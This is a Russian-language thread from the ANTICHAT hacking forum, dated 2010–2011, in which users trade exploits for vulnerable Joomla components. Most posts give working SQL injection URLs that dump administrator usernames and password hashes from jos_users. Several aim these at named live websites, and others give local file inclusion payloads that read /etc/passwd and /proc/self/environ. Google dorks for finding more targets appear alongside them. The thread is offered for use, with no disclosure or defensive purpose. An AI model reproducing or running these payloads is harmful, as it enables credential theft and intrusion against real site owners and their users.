ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

06.12.2010, 10:23
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Наверное надо оживить тему?-)
Компонент: com_storedirectory
Тип: Sql-Inj
Уязвимость в параметре id:
PoC:
http://www.cockburngateway.com.au/index.php?option=com_storedirectory&task=view&id=1 +union+select+1,2,concat%28username,0x3a,password, 0x3a,usertype%29,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21+from+jos_users--
|
|
|

06.12.2010, 18:53
|
|
Новичок
Регистрация: 29.11.2008
Сообщений: 6
Провел на форуме: 177127
Репутация:
29
|
|
Joomla 1.5-xx
com_congratulations
index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+TABLE_NAME+FROM+INFORMATION_SCH EMA.TABLES+limit+1,1)),0x71),0x71)--
http://school29.kurgan.cc/index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+CONCAT_WS(0x3a,username,passwor d)+FROM+jos_users+limit+1,1)),0x71),0x71)--
|
|
|

14.12.2010, 22:20
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
SQL inj в компоненте com_jeformcr
Доброго времени суток
SQl-Inj в com_jeformcr
Уязвимый параметр: id
Подбор кол-ва колонок через order+by
PoC:
http://www.rcreventos.com.br/rcr/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--
http://jrfu.org/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--
|
|
|

02.01.2011, 02:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 1686
Репутация:
0
|
|
Уязвимость: SQL Injection Vulnerability
Компонент: com_idoblog
Dork: inurl:"com_idoblog"
Language: php
http://extensions.joomla.org/extensions/news-production/blog/9218
Exploit:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,2,concat%28username,0 x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+jos_users--
|
|
|
|

19.01.2011, 01:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 8038
Репутация:
5
|
|
Уязвимость: Blind SQL Injection Vulnerability
Компонент: allCineVid
Dork: inurl:"com_allcinevid"
Language: php
http://www.joomtraders.com
Exploit:
http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=1
http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=0
|
|
|
|

24.01.2011, 23:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 8038
Репутация:
5
|
|
Уязвимость: Multiple SQL Injection Vulnerability
Компонент: Portfolio
Dork: inurl:"com_allcinevid"
Language: php
http://www.salvatorefresta.net
Exploit:
http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
|
|
|
|

15.02.2011, 02:22
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме: 1350
Репутация:
0
|
|
Joomla active XSS JFilterInput
Наличие эксплоита: Да
Активная XSS в Joomla версии 1.6 и более ранних. Уязвимость связана с недостаточной
фильтрацией входных данных в классе JFilterInput.
В версии 1.6, к примеру, можно проверить при включенном модуле Userrofile, вбив в поле About Me
следующий код:
В остальных случаях и версиях данной уязвимости подвержен любой модуль который принимает данные от пользователя.
|
|
|

09.04.2011, 14:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 1941
Репутация:
0
|
|
(com_jce) BLIND sql injection vulnerability
Description:
JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://host/index.php?option=com_jce&Itemid=8
|
|
|
|

10.04.2011, 16:39
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
LFI in Joomla component com_immobilien
Доброго времени суток, уважаемые форумчане.
Тип: LFI
Компонент: com_immobilien
Версия: Не знаю, тк шелл не залил
Найдена: 10.04.2011 by z0mbyak
Dork: inurl:"com_immobilien"
Vuln Code: Не искал)))
Link:
index.php?option=com_immobilien&controller=
Exploit:
../../../../../../../../../../../etc/passwd%00
PoC:
http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00
http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00
P.S Вроде не боян)
|
|
|

10.04.2011, 23:54
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Multiple Vulnerabilities in Jomla Component com_tender
И снова здравствуйте)
Тип: LFI
exploit: ../../../../../../../../../../etc/passwd%00
PoC:
http://www.moscow-tenders.ru/index.php?option=com_tender&controller=../../../../../../../../../../etc/passwd%00
Тип: Sql Inj
Вообще, массового я так и не нашел, но компонент очень дырявый)
PoC:
http://irp.omsk.info/index.php?option=com_tender&view=list&filter_type= category&filter_category%5B%5D=327&Itemid=5&comple ted=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word,0x3a,usertype),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+jos_users+where+usertype='Super%20Admi nistrator'--
https://www.itbidding.com/index.php?option=com_tender&act=opening_tender&act ion=edit_opening_tender&gov_tender_id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
P.S. Надеюсь не баян)))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|